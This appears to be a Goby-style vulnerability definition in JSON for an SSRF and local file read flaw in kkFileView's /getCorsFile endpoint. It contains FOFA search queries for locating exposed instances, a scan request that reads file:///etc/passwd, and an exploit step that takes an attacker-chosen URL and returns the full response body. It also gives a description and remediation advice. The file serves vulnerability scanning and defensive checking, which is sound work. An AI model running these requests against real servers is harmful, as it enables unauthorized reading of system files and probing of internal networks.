
{
"Name": "kkFileView SSRF vulnerability",
"Description": "<p>kkFileView is an online preview solution for files and documents; comparable paid products in the industry include [Yongzhong office], [office365] and [idocv]. With the approval of the company's management it was open-sourced under the Apache license to give back to the community, with special thanks to @Mr. Tang for his support and to @Duanmu Xiangxiao for his contribution. The project is built with the popular Spring Boot, is easy to use and deploy, and supports online preview of mainstream office documents such as doc, docx, Excel, pdf, txt, zip, rar and images.</p><p>This vulnerability is located in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java</p><p>When a file is previewed across domains, the urlPath parameter is user-controllable. By modifying this parameter an attacker can trigger SSRF and probe the server's internal network.</p>",
"Product": "kkFileView",
"Homepage": "https://github.com/kekingcn/kkFileView",
"DisclosureDate": "2020-06-14",
"Author": "桂花松糕",
"FofaQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"",
"GobyQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"",
"Level": "2",
"Impact": "<p>When a file is previewed across domains, the urlPath parameter is user-controllable. By modifying this parameter an attacker can trigger SSRF and probe the server's internal network (the file protocol is also accepted, allowing arbitrary local file read).<br></p>",
"Recommendation": "<p>1. Update to the latest version.</p><p>2. Restrict access to cross-domain file preview with appropriate permissions.</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "ssrf_cmd",
"type": "input",
"value": "file:///etc/passwd",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/getCorsFile?urlPath=file:///etc/passwd",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root:x",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/getCorsFile?urlPath={{{ssrf_cmd}}}",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(?s)(.*)"
]
}
],
"Tags": [
"Other"
],
"VulType": [
"Other"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "8.6",
"Translation": {
"CN": {
"Name": "kkFileView 服务端请求伪造漏洞",
"Product": "kkFileView",
"Description": "<p><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">kkFileView&nbsp; 此项目为文件文档在线预览项目解决方案,对标业内付费产品有【</span><a href=\"http://dcs.yozosoft.com/\">永中office</a><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">】【</span><a href=\"http://www.officeweb365.com/\">office365</a><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">】【</span><a href=\"https://www.idocv.com/\">idocv</a><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">】等在取得公司高层同意后以Apache协议开源出来反哺社区在此特别感谢@唐老大的支持以及@端木详笑的贡献。该项目使用流行的spring boot搭建易上手和部署基本支持主流办公文档的在线预览如doc,docx,Excel,pdf,txt,zip,rar,图片等等。</span></p><p><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">本次漏洞出现于:<span style=\"color: rgb(36, 41, 47); font-size: 14px;\">file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java</span></span></p><p><span style=\"color: rgb(36, 41, 47); font-size: 16px;\"><span style=\"color: rgb(36, 41, 47); font-size: 14px;\"><span style=\"color: rgb(36, 41, 47); font-size: 14px;\">当通过跨域预览文件的时候urlPath参数是用户可控的通过修改此参数可触发SSRF漏洞探测服务器内网信息。</span><br></span></span></p>",
"Recommendation": "<p>1、 更新至最新版本。</p><p>2、 跨域预览文件设置权限。</p>",
"Impact": "<p><span style=\"color: rgb(36, 41, 47); font-size: 14px;\">当通过跨域预览文件的时候urlPath参数是用户可控的通过修改此参数可触发SSRF漏洞探测服务器内网信息<span style=\"color: rgb(36, 41, 47); font-size: 14px;\">支持file协议的任意文件读取</span>)。</span><br></p>",
"VulType": [
"其他"
],
"Tags": [
"其他"
]
},
"EN": {
"Name": "kkFileView SSRF vulnerability",
"Product": "kkFileView",
"Description": "<p>kkFileView is an online preview solution for files and documents; comparable paid products in the industry include [Yongzhong office], [office365] and [idocv]. With the approval of the company's management it was open-sourced under the Apache license to give back to the community, with special thanks to @Mr. Tang for his support and to @Duanmu Xiangxiao for his contribution. The project is built with the popular Spring Boot, is easy to use and deploy, and supports online preview of mainstream office documents such as doc, docx, Excel, pdf, txt, zip, rar and images.</p><p>This vulnerability is located in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java</p><p>When a file is previewed across domains, the urlPath parameter is user-controllable. By modifying this parameter an attacker can trigger SSRF and probe the server's internal network.</p>",
"Recommendation": "<p>1. Update to the latest version.</p><p>2. Restrict access to cross-domain file preview with appropriate permissions.</p>",
"Impact": "<p>When a file is previewed across domains, the urlPath parameter is user-controllable. By modifying this parameter an attacker can trigger SSRF and probe the server's internal network (the file protocol is also accepted, allowing arbitrary local file read).<br></p>",
"VulType": [
"Other"
],
"Tags": [
"Other"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}